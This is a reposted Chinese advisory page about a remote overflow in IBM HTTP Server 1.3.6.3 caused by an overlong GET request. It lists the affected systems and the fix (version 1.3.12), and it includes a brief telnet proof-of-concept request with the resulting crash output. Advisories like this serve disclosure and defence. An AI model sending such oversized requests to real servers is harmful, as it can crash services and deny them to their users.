IBM HTTP Server 远程溢出漏洞

2016-02-19 15:12 69 1 收藏

想要天天向上,就要懂得享受学习。图老师为大家推荐IBM HTTP Server 远程溢出漏洞,精彩的内容需要你们用心的阅读。还在等什么快点来看看吧!

【 tulaoshi.com - Web开发 】

涉及程序:
  GET
  
  描述:
  通过提交超长的GET请求导致IBM HTTP Server远程溢出
  
  
  详细:
  IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。
  
  如果提交一个超过219个字符的 GET 请求,将导致服务器停止响应,并报错。要恢复服务正常工作需要重新启动应用程序。成功的利用该漏洞,攻击者可在受害的主机上执行任何代码。(但这还未得到完全证实。)
  
  
  以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
  
  
  $ telnet target 80
  GET /......(216个".")aaa HTTP/1.0
  
  则系统会报告下列错误信息:
  ***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
  ON_NOT_HANDLED.
  ***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
  注意:目标主机运行在Windows 2000下。
  
  受影响的系统
  IBM HTTP Server 1.3.6.3
  - TurboLinux Turbo Linux 3.0.1
  - Sun Solaris 2.6
  - S.u.S.E. Linux 6.1
  - S.u.S.E. Linux 6.0
  - RedHat Linux 6.0 sparc
  - RedHat Linux 5.2 sparc
  - Microsoft Windows NT 4.0
  - IBM AIX 4.2.1
  - Caldera OpenLinux 2.2
  
  解决方案:
  IBM 已经在 1.3.12 版本中解决了此问题,下载地址:
  http://www-4.ibm.com/software/webservers/httpservers/download.html
  

来源:http://www.tulaoshi.com/n/20160219/1609142.html

延伸阅读
受影响系统: MySQL AB MySQL 5.0.37 不受影响系统: MySQL AB MySQL 5.0.37 描述: BUGTRAQ ID: 22900 MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。MySQL在处理特定畸形请求时存在漏洞,远程攻击者可能利用此漏洞在导致MySQL进程崩溃。 如果MySQL用户在字符串函数...
标签: SQLServer
  Microsoft SQL Server 2000的新特性之一就是支持XML,所以用户可以通过HTTP方式直接访问具备XML功能的SQL Server2000数据库。下面介绍实现方法。 系统环境:Windows2000 Server(包含IIS)+ MS SQL Server2000 数据库:SQL Server2000附带的经典数据库样本:NorthWind 一、配置IIS和SQ...
SQL2005提供了一个新的执行存储过程或者T-SQL的方法,它可以以WEB服务的方式发布到服务器上,而无须使用IIS 这个新特点通过HTTP API把HTTP端点暴露给用户,在WINXP SP2和WIN2003上被支持 建立一个HTTP端点是非常简单的,如下: CREATE ENDPOINT MyEndpoint? STATE = STARTED AS HTTP ( AUTHENTICATION = (INTEGRATED), PATH = '...
标签: Web开发
受影响系统: Icewarp Merak Mail Server 9.3.2 不受影响系统: Icewarp Merak Mail Server 9.4.0 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 32969 Merak Email Server是一个全面的办公室局域网或Internet通讯邮件解决方案。 Mera...
提升 Linux 开发者的能力为您的 Linux 应用开发加油提速:在 Power 上使用 Linux 开放源代码工具http://www-900.cn.ibm.com/developerWorks/cn/linux/linux-speed-start/l-ss3p-open/index.shtmlhttp://www-900.cn.ibm.com/developerWorks/cn/linux/linux-speed-start/l-ss3p-open/index.shtml

经验教程

691

收藏

5
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部